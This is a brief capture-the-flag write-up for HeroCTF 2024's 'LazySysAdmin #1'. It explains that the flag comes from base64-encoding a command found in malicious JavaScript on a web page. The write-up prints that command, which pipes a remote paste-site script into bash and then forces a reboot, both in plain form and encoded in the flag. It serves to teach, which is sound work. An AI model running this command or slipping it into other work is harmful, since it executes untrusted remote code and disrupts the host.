CTFs | HeroCTF_2024 | Misc | LazySysAdmin1

LazySysAdmin #1

In this challenge we just have access to a web page and need to find the malicious code. When we access a post, we get a page with a bunch of text and if we look in the source code we can see a malicious JavaScript code :

So we just have to base64 encode curl -s https://ghostbin.site/6y65l/raw | bash && sleep 2 && reboot -f. This gives us Y3VybCAtcyBodHRwczovL2dob3N0YmluLnNpdGUvNnk2NWwvcmF3IHwgYmFzaCAmJiBzbGVlcCAyICYmIHJlYm9vdCAtZgo=.

So the flag is : HERO{Y3VybCAtcyBodHRwczovL2dob3N0YmluLnNpdGUvNnk2NWwvcmF3IHwgYmFzaCAmJiBzbGVlcCAyICYmIHJlYm9vdCAtZgo=}